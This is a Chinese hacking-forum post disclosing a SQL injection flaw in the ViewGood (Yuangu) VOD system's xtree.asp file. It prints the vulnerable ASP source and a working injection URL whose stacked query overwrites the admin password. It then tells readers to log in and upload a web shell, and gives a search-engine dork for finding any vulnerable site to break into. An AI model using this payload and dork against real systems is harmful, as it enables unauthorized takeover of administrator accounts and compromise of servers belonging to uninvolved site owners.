远古VOD系统0day以及入侵方法
远古VOD是一个很不错的系统,这个注入漏洞出现很久了,现发出来,供大家研究研究,不要破坏哦!
漏洞文件webmedia/common/function/xtree.asp

〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")

if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&amp;") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close

Response.CharSet = "GB2312"
Response.ContentType = "text/xml"
Response.Expires = -1

Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->

很容易看出以上存在着DB权限注入

注射地址：http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1

表段名：customer

构造函数 把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

登陆后台 直接上传大马 完事！

测试方法：在google baidu搜:      inurL:webmedia/         随便找个站都可以入侵

官方地址：http://www.viewgood.com/

作者注释：其实这篇文章说得比较简单，也比较笼统，相信很多人都不知道怎么利用漏洞，也体会不到这个漏洞到底有多大的危害。我就此专门写了一篇文章，希望大家能够喜欢，

文章地址：http://www.giffer.cn/article.asp?id=796